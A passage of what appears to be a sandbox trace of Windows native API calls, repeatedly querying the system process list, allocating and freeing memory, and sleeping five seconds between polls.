SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.749] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.757] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.766] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.774] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.783] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.791] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.801] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.820] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.829] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.840] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.849] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.858] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.866] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.875] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.913] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.923] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.933] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.942] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.951] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.960] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 